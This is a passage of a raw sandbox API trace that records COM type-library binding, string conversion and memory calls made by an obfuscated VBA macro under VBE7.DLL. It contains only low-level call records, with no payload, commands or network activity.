wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.891] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.891] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a614de | out: _Dst=0x67c2d40) returned 0x0 [0068.891] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_jAZA1XoD") returned 0x10ac35 [0068.891] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="iAUGAAcQ", cchCount1=-1, lpString2="_B_var_jAZA1XoD", cchCount2=-1) returned 3 [0068.891] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_jAZA1XoD" | out: _Dst="_B_var_jAZA1XoD") returned 0x0 [0068.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_jAZA1XoD") returned 16 [0068.891] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.891] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_jAZA1XoD", lHashVal=0x10ac35, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.891] IUnknown:Release (This=0x665ba50) returned 0xd [0068.891] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.891] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_jAZA1XoD", lHashVal=0x10ac35, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.891] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.891] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.891] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_jAZA1XoD", lHashVal=0x10ac35, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.891] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.891] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.891] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_jAZA1XoD", lHashVal=0x10ac35, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.891] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.892] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.892] IUnknown:Release (This=0x665ba50) returned 0xd [0068.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc2f2a, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_jAZA1XoD") returned 16 [0068.892] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_jAZA1XoD", lHashVal=0x10ac35, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x31004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x31004100000000, pDummy=0x0) returned 0x0 [0068.892] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a614de | out: _Dst=0x144ec0) returned 0x0 [0068.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6150a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="wABwxZX1") returned 9 [0068.892] ITypeComp:RemoteBind (in: This=0x665ba60, szName="wABwxZX1", lHashVal=0x10cdcb, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6150a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="wABwxZX1") returned 9 [0068.892] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="wABwxZX1", lHashVal=0x10cdcb, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6150a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="wABwxZX1") returned 9 [0068.892] ITypeComp:RemoteBind (in: This=0x665bd30, szName="wABwxZX1", lHashVal=0x10cdcb, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.892] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wABwxZX1") returned 0x10cdcb [0068.892] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="wABwxZX1" | out: _Dst="wABwxZX1") returned 0x0 [0068.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="wABwxZX1") returned 9 [0068.892] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.892] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="wABwxZX1", lHashVal=0x10cdcb, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.892] IUnknown:Release (This=0x665ba50) returned 0xd [0068.892] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.892] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="wABwxZX1", lHashVal=0x10cdcb, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.892] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.892] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.892] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="wABwxZX1", lHashVal=0x10cdcb, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.892] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.892] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.892] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="wABwxZX1", lHashVal=0x10cdcb, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.892] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6150a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="wABwxZX1") returned 9 [0068.892] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="wABwxZX1", lHashVal=0x10cdcb, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.893] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.893] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a6150a | out: _Dst=0x67c2d40) returned 0x0 [0068.893] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_wABwxZX1") returned 0x10a554 [0068.893] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_wABwxZX1" | out: _Dst="_B_var_wABwxZX1") returned 0x0 [0068.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_wABwxZX1") returned 16 [0068.893] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.893] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_wABwxZX1", lHashVal=0x10a554, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.893] IUnknown:Release (This=0x665ba50) returned 0xd [0068.893] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.893] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_wABwxZX1", lHashVal=0x10a554, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.893] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.893] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.893] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_wABwxZX1", lHashVal=0x10a554, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.893] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.893] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.893] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_wABwxZX1", lHashVal=0x10a554, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.893] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.893] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.893] IUnknown:Release (This=0x665ba50) returned 0xd [0068.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc2f5a, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_wABwxZX1") returned 16 [0068.893] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_wABwxZX1", lHashVal=0x10a554, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x78007700000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x78007700000000, pDummy=0x0) returned 0x0 [0068.893] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a6150a | out: _Dst=0x144ec0) returned 0x0 [0068.893] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0068.893] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0068.893] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.893] IUnknown:Release (This=0x665ba50) returned 0xd [0068.893] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0068.893] IUnknown:Release (This=0xaf0b528) returned 0x4 [0068.893] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.893] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.893] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.893] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.893] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.893] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.894] IUnknown:Release (This=0x665ba50) returned 0xd [0068.894] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.894] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.894] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.894] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0068.894] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0068.894] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0068.894] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.894] IUnknown:Release (This=0x665ba50) returned 0xd [0068.894] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0068.894] IUnknown:Release (This=0xaf0b528) returned 0x4 [0068.894] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.894] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.894] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.894] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.894] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.894] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.894] IUnknown:Release (This=0x665ba50) returned 0xd [0068.894] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.894] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.894] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.894] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0068.894] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0068.894] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0068.894] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.894] IUnknown:Release (This=0x665ba50) returned 0xd [0068.894] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0068.894] IUnknown:Release (This=0xaf0b528) returned 0x4 [0068.894] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.894] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.894] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.895] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.895] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.895] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.895] IUnknown:Release (This=0x665ba50) returned 0xd [0068.895] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.895] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.895] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.895] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0068.895] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0068.895] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.895] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.895] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.895] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.895] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.895] IUnknown:Release (This=0x665ba50) returned 0xd [0068.895] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.895] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.895] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.895] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0068.895] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0068.895] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.895] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.895] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.895] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.895] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.895] IUnknown:Release (This=0x665ba50) returned 0xd [0068.895] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.895] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.895] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61462, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="fAGXXX4") returned 8 [0068.896] ITypeComp:RemoteBind (in: This=0x665ba60, szName="fAGXXX4", lHashVal=0x107669, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61462, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="fAGXXX4") returned 8 [0068.896] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="fAGXXX4", lHashVal=0x107669, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61462, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="fAGXXX4") returned 8 [0068.896] ITypeComp:RemoteBind (in: This=0x665bd30, szName="fAGXXX4", lHashVal=0x107669, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.896] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fAGXXX4") returned 0x107669 [0068.896] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="fAGXXX4" | out: _Dst="fAGXXX4") returned 0x0 [0068.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, 